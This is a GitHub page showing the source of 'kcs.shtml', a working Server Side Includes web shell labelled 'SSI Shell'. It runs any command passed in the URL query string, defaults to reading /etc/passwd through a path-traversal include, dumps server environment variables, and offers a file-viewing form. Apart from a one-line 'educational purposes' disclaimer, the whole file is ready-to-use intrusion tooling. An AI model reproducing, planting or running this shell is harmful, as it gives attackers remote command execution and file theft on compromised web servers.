-
Notifications
You must be signed in to change notification settings - Fork 0
/
kcs.shtml
89 lines (89 loc) · 3.39 KB
/
kcs.shtml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
<!--#config errmsg="[Error in shell]"-->
<!--#set var="zero" value="" -->
<!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
<!--#set var="shl" value="ls -al" -->
<!--#else -->
<!--#set var="shl" value=$QUERY_STRING_UNESCAPED -->
<!--#endif -->
<!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
<!--#set var="inc" value="/../../../../../../../etc/passwd" -->
<!--#else -->
<!--#set var="inc" value=$QUERY_STRING_UNESCAPED -->
<!--#endif -->
<html>
<head>
<title>
SSI Shell
</title>
<script language="javascript">
function fex()
{
document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+document.getElementById('command').value;
}
function vfile()
{
document.location.href="<!--#echo var=DOCUMENT_NAME -->?cat "+document.getElementById('vfile').value;
}
</script>
</head>
<body bgcolor=#e4e0d8 alink=blue vlink=blue>
<div align=center width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+2><a href=http://github.com/Anon-Exploiter>SSI Shell</a></font></b></center>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Shell info</font></b></center>
<br>
<b><font color=blue>GMT date</font></b>: <b><!--#echo var=DATE_GMT --></b><br>
<b><font color=blue>Local date</font></b>: <b><!--#echo var=DATE_LOCAL --></b><br>
<b><font color=blue>Document name</font></b>: <b><!--#echo var=DOCUMENT_NAME --></b><br>
<b><font color=blue>Document URI</font></b>: <b><!--#echo var=DOCUMENT_URI --></b><br>
<b><font color=blue>Last modified</font></b>: <b><!--#echo var=LAST_MODIFIED --></b><br>
<b><font color=blue>Owner</font></b>: <b><!--#echo var=USER_NAME --></b><br>
<br>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Server info</font></b></center>
<br>
<pre>
<!--#printenv-->
</pre>
<br>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Command for shell & address for inclusion</font></b></center>
<br>
<b><font color=blue>Enter command/address</font></b>: <input type=text size=80 id=command> <input type=button value=Run onclick=fex();>
<br>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Shell</font></b></center>
<br>
<b><font color=blue>Executed command</font></b>: <b><!--#echo var=shl --></b><br>
<textarea bgcolor=#e4e0d8 cols=121 rows=15>
<!--#exec cmd=$shl -->
</textarea>
<br>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Operations on files</font></b></center>
<br>
<b><font color=blue>View file (cat)</font></b>: <input type=text size=80 id=vfile value=<!--#echo var=SCRIPT_FILENAME -->> <input type=button value=Run onclick=vfile();><br>
<b><font color=blue>Included file</font></b>: <b><!--#echo var=inc --></b><br>
<textarea bgcolor=#e4e0d8 cols=121 rows=15>
<!--#include virtual=$inc -->
</textarea>
<br>
</div>
<br>
<div align=center width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1><a href=http://github.com/Anon-Exploiter>(c) :V ( :3 )</a></font></b><br><small>2009, v1.02<!--êîïèðàéò ïîìåíÿí â 2011 ;) --></small><br>
ONLY FOR EDUCATIONAL PURPOSES. ILLEGAL ACTIVITIES PROHIBITED.
</center>
</div>
</body>
</html>